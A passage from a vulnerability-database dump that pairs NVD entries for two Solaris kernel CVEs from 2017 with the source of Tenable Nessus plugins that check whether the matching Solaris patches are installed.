package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpiclu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.06.03.09.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandr\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandu\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandr\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandu\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust1\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust2\", version:\"11.10.0,REV=2007.07.08.17.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FJSVhea / FJSVmdbr / FJSVpiclu / SUNWarc / SUNWarcr / SUNWbtool / etc\");\n}\n", "naslFamily": "Solaris Local Security Checks", "pluginID": "107721", "cpe": ["p-cpe:/a:oracle:solaris:10:150169", "p-cpe:/a:oracle:solaris:10:139944", "p-cpe:/a:oracle:solaris:10:150307", "p-cpe:/a:oracle:solaris:10:150629", "p-cpe:/a:oracle:solaris:10:146838", "p-cpe:/a:oracle:solaris:10:139510", "p-cpe:/a:oracle:solaris:10:152539", "p-cpe:/a:oracle:solaris:10:150108", "p-cpe:/a:oracle:solaris:10:149718", "p-cpe:/a:oracle:solaris:10:122255", "p-cpe:/a:oracle:solaris:10:148161", "p-cpe:/a:oracle:solaris:10:150115", "p-cpe:/a:oracle:solaris:10:151145", "p-cpe:/a:oracle:solaris:10:150125", "p-cpe:/a:oracle:solaris:10:150841", "p-cpe:/a:oracle:solaris:10:150527", "p-cpe:/a:oracle:solaris:10:150541", "p-cpe:/a:oracle:solaris:10:150627", "p-cpe:/a:oracle:solaris:10:127980", "p-cpe:/a:oracle:solaris:10:148557", "p-cpe:/a:oracle:solaris:10:150400", "p-cpe:/a:oracle:solaris:10:148730", "p-cpe:/a:oracle:solaris:10:151149", "p-cpe:/a:oracle:solaris:10:148766", "p-cpe:/a:oracle:solaris:10:149502", "p-cpe:/a:oracle:solaris:10:152530", "p-cpe:/a:oracle:solaris:10:150311", "p-cpe:/a:oracle:solaris:10:146808", "p-cpe:/a:oracle:solaris:10:152367", "p-cpe:/a:oracle:solaris:10:150109", "p-cpe:/a:oracle:solaris:10:147697", "p-cpe:/a:oracle:solaris:10:149640", "p-cpe:/a:oracle:solaris:10:148553", "p-cpe:/a:oracle:solaris:10:144540", "p-cpe:/a:oracle:solaris:10:150300", "p-cpe:/a:oracle:solaris:10:149648", "p-cpe:/a:oracle:solaris:10:142332", "p-cpe:/a:oracle:solaris:10:150760", "p-cpe:/a:oracle:solaris:10:150756", "p-cpe:/a:oracle:solaris:10:148875", "p-cpe:/a:oracle:solaris:10:150840", "p-cpe:/a:oracle:solaris:10:149616", "p-cpe:/a:oracle:solaris:10:142007", "p-cpe:/a:oracle:solaris:10:149642", "p-cpe:/a:oracle:solaris:10:137048", "p-cpe:/a:oracle:solaris:10:151425", "cpe:/o:oracle:solaris:10", "p-cpe:/a:oracle:solaris:10:148174", "p-cpe:/a:oracle:solaris:10:148231", "p-cpe:/a:oracle:solaris:10:150161", "p-cpe:/a:oracle:solaris:10:149729", "p-cpe:/a:oracle:solaris:10:148721", "p-cpe:/a:oracle:solaris:10:146848", "p-cpe:/a:oracle:solaris:10:150532", "p-cpe:/a:oracle:solaris:10:151608", "p-cpe:/a:oracle:solaris:10:148338", "p-cpe:/a:oracle:solaris:10:150531"], "scheme": null}
{"cve": [{"lastseen": "2019-10-04T12:18:46", "bulletinFamily": "NVD", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks of this vulnerability can result in takeover of Solaris. CVSS 3.0 Base Score 6.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-10004", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10004", "published": "2017-08-08T15:29:00", "title": "CVE-2017-10004", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-04T12:18:46", "bulletinFamily": "NVD", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel). Supported versions that are affected are 10 and 11. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data. CVSS 3.0 Base Score 1.8 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N).", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-10122", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10122", "published": "2017-08-08T15:29:00", "title": "CVE-2017-10122", "type": "cve", "cvss": {"score": 1.2, "vector": "AV:L/AC:H/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2019-11-03T12:17:12", "bulletinFamily": "scanner", "description": "This Solaris system is missing necessary patches to address critical\nsecurity updates :\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: Kernel). Supported\n versions that are affected are 10 and 11. Easily\n exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Solaris\n executes to compromise Solaris. Successful attacks of\n this vulnerability can result in takeover of Solaris.\n (CVE-2017-10004)\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: Kernel). Supported\n versions that are affected are 10 and 11. Difficult to\n exploit vulnerability allows high privileged attacker\n with logon to the infrastructure where Solaris executes\n to compromise Solaris. Successful attacks require human\n interaction from a person other than the attacker.\n Successful attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Solaris accessible data. (CVE-2017-10122)", "modified": "2019-11-02T00:00:00", "id": "SOLARIS_JUL2017_SRU11_3_21_5_0.NASL", "href": "https://www.tenable.com/plugins/nessus/101803", "published": "2017-07-19T00:00:00", "title": "Oracle Solaris Critical Patch Update : jul2017_SRU11_3_21_5_0", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle CPU for jul2017.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101803);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2018/11/14 14:36:23\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Oracle Solaris Critical Patch Update : jul2017_SRU11_3_21_5_0\");\n script_summary(english:\"Check for the jul2017 CPU\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch from CPU\njul2017.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This Solaris system is missing necessary patches to address critical\nsecurity updates :\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: Kernel). Supported\n versions that are affected are 10 and 11. Easily\n exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Solaris\n executes to compromise Solaris. Successful attacks of\n this vulnerability can result in takeover of Solaris.\n (CVE-2017-10004)\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: Kernel). Supported\n versions that are affected are 10 and 11. Difficult to\n exploit vulnerability allows high privileged attacker\n with logon to the infrastructure where Solaris executes\n to compromise Solaris. Successful attacks require human\n interaction from a person other than the attacker.\n Successful attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Solaris accessible data. (CVE-2017-10122)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.oracle.com/epmos/faces/DocumentDisplay?id=2280322.1\"\n );\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3809960.xml\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?322067e2\"\n );\n # https://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88deb2ba\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the jul2017 CPU from the Oracle support website.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\n\n\nfix_release = \"0.5.11-0.175.3.21.0.5.0\";\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.3.21.0.5.0\", sru:\"11.3.21.5.0\") > 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report2());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_OS_RELEASE_NOT, \"Solaris\", fix_release, release);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:04", "bulletinFamily": "scanner", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.", "modified": "2019-11-02T00:00:00", "id": "SOLARIS10_X86_150401-51.NASL", "href": "https://www.tenable.com/plugins/nessus/108200", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 150401-51", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108200);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/22 9:47:14\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (x86) : 150401-51\");\n script_summary(english:\"Check for patch 150401-51\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150401-51\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150401-51\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150401-51\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:127981\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142008\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142047\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142333\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144312\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144541\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146448\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146809\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146839\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146849\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:147698\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148175\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148232\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148554\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148558\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148678\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148722\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148767\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148876\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149313\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149503\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149617\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149637\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149641\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149643\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149649\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149730\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150116\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150118\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150154\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150162\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150170\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150301\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150385\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150401\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150528\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150628\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150630\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150636\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150757\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150761\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151150\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151426\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWcpc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWesu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWlxr\", version:\"11.10.0,REV=2007.06.20.13.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.13.23.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) 